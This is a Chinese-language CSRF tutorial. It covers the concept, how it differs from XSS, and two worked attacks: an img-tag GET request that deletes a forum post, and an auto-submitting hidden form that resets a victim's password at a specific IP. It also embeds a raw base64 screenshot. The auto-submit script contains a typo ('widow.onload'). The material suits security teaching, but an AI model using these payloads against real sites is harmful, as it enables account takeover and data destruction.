CSRF

当你登录某个网站时,通常浏览器与网站都会形成一个会话,在会话没有结束时你可以执行
发表文章、发邮件、删除文章等操作,若会话结束,你再操作的话会提示你会话已经结束,
请重新登录。
CSRF(客户端跨站请求伪造)就是:攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾认证过的网站并执行

一些操作。也可以说CSRF就是黑客利用受害者的Cookie骗取服务器的信任从而执行一些操作。

CSRF和SSRF都不能盗取Cookies

XSS区别

XSS利用的是用户对指定网站的信任

CSRF利用的是网站对用户网页浏览器的信任

利用

利用条件:
  1.攻击者可以得知url的所有参数项并了解其含义。
  2.诱导用户访问构造好的payload

  3.简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。

利用地方:
  1.操作是有意义的(比如:修改密码等)
  2.验证过于简单(参数固定、我们可以设置参数)

 GET型CSRF攻击

若有论坛www.aa.com,论坛删除文章的操作是请求类似
http://www.aa.com/opt.php?id=135&act=del&name=Tom的链接
有用户A,他登录了论坛,且有篇文章id=251,那么他的浏览器此时已经取得了论坛的信任
此时有hacker用户B,他构造了一个src跳转html为b.html,b,html内容如下:

<html>
<head>
<title>test</title>
</head>
<body>
<img src="http://www.aa.com/opt.php?id=251&act=del&name=A" />
</body>
</html>

将b.html放在他自己搭建的网站上,网址为http://www.bb.com/b.html

恶意用户B将链接http://www.bb.com/b.html通过qq发送给用户A,诱使他访问,用户A一旦访问,他id为251的文章就会被删除。

 POST型CSRF攻击

若网站www.xx.com有让用户修改密码的功能,但验证过于简单,形如下图:

aaarticlea/png;base64,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" alt="" />

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>aa</title>
</head>
<body>
<form action="http://172.23.10.200/index.php/User/Index/RegisterUpdate/id/286" method="post">
昵称:<input type="text" name="password" id="password" class="form-control" value="xxxxx">
用户名:<input type="text" name="password" id="password" class="form-control" value="xiaoming">
密码:<input type="password" name="password" id="password" class="form-control" value="">
确认密码:<input type="password" name="cpassword" id="conpassword" class="form-control" value="">
<input type="submit" name="button" value="提交">
</form>
</body>
</html>此时我们就可以构造自动提交表单的xxxx.html,内容如下:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>test</title>
</head>
<body>
<form action="http://172.23.10.200/index.php/User/Index/RegisterUpdate/id/286" method="post" id="test">
<input type="hidden" name="password" id="password" value="666666">
<input type="hidden" name="cpassword" id="conpassword" value="666666">
</form>
<script type="text/javascript">
widow.onload= function(){
document.getElementById('test').submit();
// document.forms[0].submit();
}
</script>
</body>
</html>

